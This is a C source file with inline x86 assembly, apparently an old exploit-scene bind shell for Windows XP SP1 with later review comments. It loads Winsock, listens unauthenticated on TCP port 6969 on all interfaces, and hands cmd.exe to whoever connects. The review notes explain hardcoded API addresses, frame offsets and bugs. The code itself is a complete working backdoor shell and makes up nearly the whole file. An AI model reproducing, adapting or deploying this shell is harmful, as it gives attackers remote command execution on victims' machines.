/*
Assembly Bind Shell for Windows XP SP1
by xoclipse
xoclipse@cox.net
http://xoclipse.fraghosts.net
*/

#include <stdio.h>
#include <windows.h>

// Defined below: runs the bind shell from MSVC inline assembly.  Not
// expected to return (it ends by calling the exit routine).
void doAsm();

// Program entry: everything happens inside doAsm(), which is meant to
// terminate the process itself; the return below is only reached if that
// exit call ever came back.
int main(void)
{
	doAsm();
	return 0;
}
//---------------------------------------------------------------------
// doAsm -- bind shell implemented in MSVC inline assembly.
//
// Flow (one local asm routine per step, see the labels in the _asm block):
//   LoadLibrary("msvcrt.dll"), LoadLibrary("ws2_32.dll")
//   WSAStartup(MAKEWORD(1,1), &wsad)
//   WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0)
//   bind(INADDR_ANY:6969) / listen(10) / accept() one client
//   CreateProcess("cmd.exe") with stdin/stdout/stderr = the client socket
//   call the routine at exit_app
//
// No parameters, no return value; the function is not expected to return
// normally (see the exitApp note at the bottom of the asm block).
//
// Review notes:
//  * Every API is reached through an absolute address baked into a local
//    (load_library, wsastartup, socket_address, ...).  Those only hold for
//    the DLL builds the author targeted -- Windows XP SP1 per the file
//    header.  Nothing resolves them at run time, so on any other build or
//    service pack the calls land in the wrong code.
//  * The listener is unauthenticated and bound to INADDR_ANY: anyone who
//    can reach TCP/6969 gets cmd.exe running as this process's user.
//  * No API return value is checked anywhere.  system_address (ebp-16) and
//    lasterror (ebp-88) hold addresses the assembly never reads.
//  * The C locals below are never touched by C code; they exist to reserve
//    stack slots that the assembly addresses by fixed ebp offsets (the
//    "//ebp-N" annotations).  That is an assumption about this compiler's
//    frame layout (locals in declaration order, frame pointer kept) --
//    confirm it against the assembly listing before reusing.  Several
//    annotations are also stale: the asm uses ebp-76 for sock_info (not
//    ebp-64), ebp-116 for proc_info (not ebp-104), ebp-184 for start_info
//    (not ebp-120) and ebp-596 for wsad (not ebp-196).
void doAsm()
{

	char stuff[] = "cmd.exe\0";					//ebp-12  lpCommandLine for CreateProcess
	unsigned int system_address = 0x77c28044;	//ebp-16  (never referenced by the asm)
	unsigned int load_library = 0x77e7d961;     //ebp-20  LoadLibrary
	char stuff1[] = "msvcrt.dll\0";				//ebp-32
	char stuff2[] = "ws2_32.dll\0";				//ebp-44
	unsigned int winsock_version = 0x00000101;  //ebp-48  MAKEWORD(1,1)
	unsigned int wsastartup = 0x71ab41da;		//ebp-52  WSAStartup
	unsigned int socket_address = 0x71ab5a01;	//ebp-56  WSASocket (six arguments are pushed)
	unsigned int socket;						//ebp-60  listening socket, written by socketCall
	struct sockaddr_in sock_info;				//ebp-64  the asm actually fills ebp-76..ebp-61
	unsigned int bind_address =	0x71ab3ece;		//ebp-80  bind
	unsigned int listen_address = 0x71ab5de2;	//ebp-84  listen
	unsigned int lasterror =	0x71ab1740;		//ebp-88  (never referenced by the asm)
	unsigned int client_sock;					//ebp-92  accepted socket, written by bindAndListen
	unsigned int accept_address = 0x71ab868d;	//ebp-96  accept
	unsigned int create_process = 0x77e61bbc;	//ebp-100 CreateProcess
	PROCESS_INFORMATION proc_info;				//ebp-104 the asm uses ebp-116
	STARTUPINFO start_info;						//ebp-120 the asm uses ebp-184
	unsigned int memset_address = 0x77c43590;	//ebp-188 memset (cdecl: caller pops the args)
	unsigned int exit_app = 0x77e798fd;			//ebp-192 exit routine, presumably ExitProcess -- confirm
	WSAData wsad;								//ebp-196 the asm uses ebp-596

	//PF_INET=2 | SOCK_STREAM=1 | IPPROTO_TCP=6
	//AF_INET=2	| INADDR_ANY=0
	//
	// Calling conventions: memset is cdecl, so its caller pops the three
	// arguments (the "add esp, 12" in dispatchShell).  The Win32 / Winsock
	// imports are stdcall and pop their own arguments, which is why no other
	// call below is followed by an esp adjustment.
	_asm {

		; LoadLibrary("msvcrt.dll")
		; NOTE(review): eax is pushed as the argument to loadTheLibrary but
		; nothing pops it afterwards (loadTheLibrary only balances its own
		; sub esp, 4).  Each of the two calls therefore leaves 4 stray bytes
		; on the stack; harmless only because control never returns past
		; exitApp (assuming the routine at exit_app terminates the process).
		lea eax, dword ptr[ebp-32]
		push eax
		call loadTheLibrary


		; LoadLibrary("ws2_32.dll")  -- same stack leak as above
		lea eax, dword ptr[ebp-44]
		push eax
		call loadTheLibrary


		; WSAStartup(MAKEWORD(1,1), &wsad)
		call winsckStartup

		; WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0) -> [ebp-60]
		call socketCall

		; bind() and listen(), then block in accept() -> [ebp-92]
		call bindAndListen

		; dispatch shell to listener: CreateProcess("cmd.exe") on the client socket
		call dispatchShell

		; exit app -- not expected to return; if it did, execution would
		; fall straight into loadTheLibrary below with an unbalanced stack
		call exitApp

loadTheLibrary:
		; Local routine: LoadLibrary(lpLibFileName).
		; In:  [esp+4]  = pointer to the DLL name, pushed by the caller
		;      [ebp-20] = address of LoadLibrary, read before ebp is re-based
		; Out: eax = LoadLibrary's result (HMODULE or NULL); never checked.
		; ebp is saved/restored; eax is clobbered.

		push ebp					; put ebp on stack
		mov eax, dword ptr[ebp-20]	; move address of LoadLibrary() into eax
		mov ebp, esp				; save our stack pointer into ebp ([ebp+4] = return addr, [ebp+8] = name ptr)
		sub esp, 4					; reserves 4 bytes that are never written; only balanced by the add below

		push dword ptr[ebp+8]		; push address of string of library we want to load(1st argument)
		call eax					; call LoadLibrary() (stdcall: pops its own argument)

		add esp, 4
		pop ebp
		ret

winsckStartup:
		; Local routine: WSAStartup(0x0101, &wsad).
		; Saves ebp/eax/ebx/ecx/edx and keeps a copy of the caller's frame
		; pointer in eax so the locals can still be reached after ebp is
		; re-based.  The int result lands in eax and is thrown away when
		; eax is restored.

		push ebp					; put ebp on stack
		push eax
		push ebx
		push ecx
		push edx

		mov eax, ebp				; move base pointer into eax
		mov ebp, esp				; move stack pointer into ebp

		lea ebx, [eax-196]			; ebx = ebp-196, the wsad slot per the annotation above
		sub ebx, 400				; step down to the struct's lowest address (400 is presumably
									; sizeof(WSADATA) on 32-bit).  NOTE(review): whether ebp-596 is
									; really the first byte of wsad depends on the compiler's frame
									; layout/padding -- verify in the listing; if wsad starts at
									; ebp-592 this pointer is 4 bytes low and WSAStartup writes
									; 4 bytes below it.
		mov ecx, dword ptr[eax-48]	; move winsock version into ecx
		mov edx, dword ptr[eax-52]	; move address of WSAStartup() into edx

		push ebx					; lpWSAData
		push ecx					; wVersionRequested
		call edx

		pop edx
		pop ecx
		pop ebx
		pop eax
		pop ebp
		ret

socketCall:
		; Local routine: [ebp-60] = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP,
		; NULL, 0, 0).  Only eax is preserved; the returned value is stored
		; without being checked.

		push eax

		mov eax, dword ptr[ebp-56]
		push 0						; dwFlags
		push 0						; g (socket group)
		push 0						; lpProtocolInfo
		push 6						; IPPROTO_TCP
		push 1						; SOCK_STREAM
		push 2						; PF_INET
		call eax

		mov dword ptr[ebp-60], eax	; listening socket handle

		pop eax
		ret

bindAndListen:
		; Local routine: bind([ebp-60], INADDR_ANY:6969), listen(..., 10),
		; then block in accept(); the client socket is stored at [ebp-92].
		; Preserves eax/ebx/ecx.  None of the three results is checked, so a
		; failed bind (e.g. port already in use) still falls through to
		; listen/accept.

		push eax
		push ebx
		push ecx

		mov ecx, dword ptr[ebp-60]	; handle of socket

		lea ebx, dword ptr[ebp-64]	; top of the sockaddr_in slot; the struct is built at ebx-12..ebx+3

		; fill up structure, sockaddr_in
		mov dword ptr[ebx-12], 391b0002h		; stored little-endian as 02 00 1b 39: sin_family = AF_INET (2),
												; sin_port = 0x1b39 in network byte order = 6969
		mov dword ptr[ebx-8], 00000000h			; .s_addr - INADDR_ANY
		mov dword ptr[ebx-4], 00000000h			; sin_zero[0..3]
		mov dword ptr[ebx], 00000000h			; sin_zero[4..7]
		sub ebx, 12								; ebx = ebp-76 = struct sockaddr* for bind()
		

		mov eax, dword ptr[ebp-80]	; address of bind()

		; bind()
		push 00000010h				; sizeof(struct sockaddr_in)
		push ebx					; sockaddr_in structure
		push ecx					; handle to socket
		call eax

		mov eax, dword ptr[ebp-84]
		mov ebx, dword ptr[ebp-60]

		; listen(sockfd, 10)
		push 10
		push ebx
		call eax

		mov eax, dword ptr[ebp-96]
		mov ebx, dword ptr[ebp-60]

		; accept new client: accept(sockfd, NULL, NULL) -- blocks until a peer connects
		push 00000000
		push 00000000
		push ebx
		call eax

		mov dword ptr[ebp-92], eax	; client's socket handle

		pop ecx
		pop ebx
		pop eax
		ret

dispatchShell:
		; Local routine: zero a STARTUPINFO at ebp-184, point its three
		; standard handles at the accepted client socket, then
		; CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi).
		; bInheritHandles = TRUE is what lets the child inherit the socket, so
		; cmd.exe's I/O goes to the remote peer.  Preserves eax/ebx/ecx/edx;
		; the BOOL result is discarded.

		push eax
		push ebx
		push ecx
		push edx

		; memset(&start_info, 0, sizeof(STARTUPINFO));
		lea ebx, dword ptr[ebp-184]
		mov eax, dword ptr[ebp-188]
		push 68						; sizeof(STARTUPINFO) on 32-bit (0x44), same as the cb stored below
		push 0
		push ebx
		call eax
		add esp, 12					; memset is cdecl -> caller pops the three args

		; fill startup info structure
		mov dword ptr[ebx], 00000044h		; cb = sizeof(STARTUPINFO)
		mov dword ptr[ebx+45], 00000001h	; NOTE(review): writes the dword 1 at byte offset 45, i.e. one
											; byte into the dword at offset 44, so that field ends up as
											; 0x100 (not 1) and the byte at offset 48 is zeroed.  On the
											; 32-bit layout offset 44 is dwFlags and 0x100 is
											; STARTF_USESTDHANDLES -- verify against winbase.h; if that is
											; the intent, "mov dword ptr[ebx+44], 100h" says so plainly.
		mov ecx, dword ptr[ebp-92]
		mov dword ptr[ebx+56], ecx			; hStdInput  = client socket (offsets 56/60/64 per the 32-bit layout)
		mov dword ptr[ebx+60], ecx			; hStdOutput = client socket
		mov dword ptr[ebx+64], ecx			; hStdError  = client socket
		
		; CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
		mov eax, dword ptr[ebp-100]			; address of createprocess
		lea ecx, dword ptr[ebp-116]			; address of processinfo
		lea edx, dword ptr[ebp-12]			; address of "cmd.exe"
		
		push ecx							; lpProcessInformation
		push ebx							; lpStartupInfo
		push 00000000						; lpCurrentDirectory = NULL
		push 00000000						; lpEnvironment = NULL
		push 00000000						; dwCreationFlags = 0
		push 00000001						; bInheritHandles = TRUE
		push 00000000						; lpThreadAttributes = NULL
		push 00000000						; lpProcessAttributes = NULL
		push edx							; lpCommandLine = "cmd.exe"
		push 00000000						; lpApplicationName = NULL
		call eax

		pop edx
		pop ecx
		pop ebx
		pop eax
		ret
		
exitApp:
		; Local routine: call the routine at [ebp-192] with a single 0
		; argument (the caller labels it "exit app"; presumably ExitProcess(0)
		; -- confirm).  Not expected to return.  If it did, the ret below
		; goes back to the caller, whose next instruction is the first one of
		; loadTheLibrary.
		
		push eax
		
		mov eax, dword ptr[ebp-192]
		push 0						; exit code 0
		call eax

		pop eax
		ret
	}
}
//-----------------------------------------------------------------